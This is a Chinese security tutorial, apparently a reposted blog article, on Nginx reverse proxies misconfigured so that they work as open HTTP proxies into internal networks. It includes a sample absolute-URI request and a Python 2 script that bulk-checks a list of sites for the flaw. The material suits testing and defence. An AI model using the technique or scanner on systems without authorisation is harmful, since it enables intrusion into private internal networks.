经验首页 前端设计 程序设计 Java相关 移动开发 数据库/运维 软件/图像 大数据/云计算 其他经验
当前位置:技术经验 » 其他 » 网络安全 » 查看文章
刺透内网的HTTP代理
来源:cnblogs  作者:i春秋学院  时间:2018/9/25 20:03:23  对本文有异议

从偶然出发

在做测试的时候发现了这样一个漏洞,原请求报文如下:

  1. GET / HTTP/1.1
  2. Host: attack_website
  3. [... HEADER ...]
  4. ...

当时最初目的是想测SSRF的,但是经过测试没发现存在漏洞后来想起之前看过的一些漏洞案例,将请求报文中的URI部分替换成了网址:

http://gh0st.cn

就变成了如下的请求:

  1. GET http://gh0st.cn HTTP/1.1
  2. Host: attack_website
  3. [... HEADER ...]
  4. ...

在BurpSuite里进行重放测试发现返回的响应正文就是http://gh0st.cn 的,也就是说这里的attack_website可以被作为HTTP代理,于是进入下一步的测试能否使用非http/https协议进行请求?例如file:/// ,测试后发现确实没办法这样玩,看来是这里代理服务器不支持。

在这里替换URI部分为内网的地址,可以直接漫游内网的系统,进行深入的渗透测试了,后续的事情就不在这多说了,那么来研究看看为什么会有这样的问题呢?

从被动偶然到主动发现

了解原理

查阅了一番资料和询问了一下朋友,都说具体的不太清楚,后来看见这样一篇文章:

https://www.secpulse.com/archives/74676.html

其中所说原理大致是因为Nginx反向代理配置不当导致可以被作为正向代理,导致能被外部作为HTTP代理服务器。

正向代理 and 反向代理

正向代理

  • 浏览器(/全局)设置代理服务器IP和对应端口
  • 浏览器输入目标地址->代理服务器->目标服务器

简而言之,正向代理类似我们经常用到的跳板机,利用代理去访问外部的资源。

反向代理

跟正代不同的地方在于反向代理相对浏览器来说是透明的,不需要在浏览器(/全局)做什么配置,而是有反向代理服务器自己做请求转发到其服务器上所配置的地址。

大致如下的流程:

  1. 浏览器访问网站(网站所指即反向代理服务器)
  2. 网站(反向代理服务器)做处理,将请求转发给所设置的目标服务器
  3. 由请求最终到达的目标服务器响应给网站(反向代理服务器),然后再通过其返回给浏览器

TIPs:

  • 一、反向代理服务器也可以变成WAF(例如Nginx支持反代功能,nginx+lua也可以搭建网站waf)
  • 二、反向代理服务器也可以起到负载均衡的作用,由反向代理服务器做选择分配Web服务器

主动发现脚本开发

脚本语言选择:python2.7

系统环境:all

思考

如何判断这个网站存在可以作为HTTP代理访问资源?唯一特征是什么?

脑子中唯一的思路就是IP,如果这目标站点能作为HTTP代理访问资源,那么我设置的这个资源就是返回真实IP的,这样就可以判断了~

这里我在团队官网上小小的写了一个,但是在大批量去测试却无法使用,因为官网的空间没那么大的吞吐量,承载不住高并发,后期建议大家使用 http://httpbin.org/ip 这个接口~

http://www.hi-ourlife.com/getip.php

PHP代码:

  1. <?php
  2. echo $_SERVER['REMOTE_ADDR'];
  3. ?>

代码构建

Import 库

  1. import urllib, sys, re, json

全局变量:

  1. poc = "http://www.hi-ourlife.com/getip.php"

获取使用代理访问资源后内容(IP)函数:

  1. def useProxy(site):
  2.         try:
  3.                 res = urllib.urlopen(poc, proxies={'http': site}).read()
  4.                 return res
  5.         except:
  6.                 return getIP()

正常本机获取IP函数:

  1. def getIP():
  2.         res = urllib.urlopen(poc).read()
  3.         return res

防止有些会出错返回的内容不是IP,其实返回不是IP也就间接证明不存在这种漏洞,所以需要写个正则来匹配,这时候判断是否是IP的函数就诞生了:

  1. def isIP(ip):
  2.     compileIP = re.compile('^((25[0-5]|2[0-4]\d|[01]?\d\d?)\.){3}(25[0-5]|2[0-4]\d|[01]?\d\d?)$')
  3.     if compileIP.match(ip):
  4.         return True
  5.     else:
  6.         return False

对比IP函数:

  1. def isVul(site):
  2.         resA = getIP()
  3.         #print resA
  4.         resB = useProxy(site)
  5.         #print resB
  6.         if resA == resB or not isIP(resB):
  7.                 print "\033[1;33m[INFO]\033[0m No Vulnerability!"
  8.         else:
  9.                 print "\033[1;31m[INFO]\033[0m Existing Vulnerability!"
  10.                 print "\033[1;36m[INFO]\033[0m Site:[ {0} ] -> RealIP:[ {1} ]".format(site, resB)

单线程批量

从扫描器里把代码模板剥离了出来如下:

  1. #-*- coding:utf-8 -*-
  2. #Author: Vulkey_Chen
  3. import urllib, sys, re, json
  4. poc = "http://www.hi-ourlife.com/getip.php"
  5. def useProxy(site):
  6.         try:
  7.                 res = urllib.urlopen(poc, proxies={'http': site}).read()
  8.                 return res
  9.         except:
  10.                 return getIP()
  11. def getIP():
  12.         res = urllib.urlopen(poc).read()
  13.         return res
  14. def getSite(filename):
  15.         f = open(filename)
  16.         res = []
  17.         for line in f:
  18.                 res.append(line)
  19.         return res
  20. def isIP(ip):
  21.     compileIP = re.compile('^((25[0-5]|2[0-4]\d|[01]?\d\d?)\.){3}(25[0-5]|2[0-4]\d|[01]?\d\d?)$')
  22.     if compileIP.match(ip):
  23.         return True
  24.     else:
  25.         return False
  26. def isVul(site):
  27.         resA = getIP()
  28.         #print resA
  29.         resB = useProxy(site)
  30.         #print resB
  31.         if resA == resB or not isIP(resB):
  32.                 print "\033[1;33m[INFO]\033[0m No Vulnerability!"
  33.         else:
  34.                 print "\033[1;31m[INFO]\033[0m Existing Vulnerability!"
  35.                 print "\033[1;36m[INFO]\033[0m Site:[ {0} ] -> RealIP:[ {1} ]".format(site, resB)
  36. def main(filename):
  37.         for i in getSite(filename):
  38.                 isVul(i.replace("\n",""))
  39. if __name__ == '__main__':
  40.         main(sys.argv[1])

END

使用方法:python proxy_vul.py urls.txt

urls.txt 格式:

  1. http://www.hi-ourlife.com/
  2. https://gh0st.cn/
  3. http://mst.hi-ourlife.com:8080/

建议批量方法:

扫描所有想检测站点的web服务端口(Nginx容器存在此类问题居多),然后使用脚本检测。

大家有任何问题可以提问,更多文章可到i春秋论坛阅读哟~

 友情链接:直通硅谷  点职佳  北美留学生论坛

本站QQ群:前端 618073944 | Java 606181507 | Python 626812652 | C/C++ 612253063 | 微信 634508462 | 苹果 692586424 | C#/.net 182808419 | PHP 305140648 | 运维 608723728

W3xue 的所有内容仅供测试,对任何法律问题及风险不承担任何责任。通过使用本站内容随之而来的风险与本站无关。
关于我们  |  意见建议  |  捐助我们  |  报错有奖  |  广告合作、友情链接(目前9元/月)请联系QQ:27243702 沸活量
皖ICP备17017327号-2 皖公网安备34020702000426号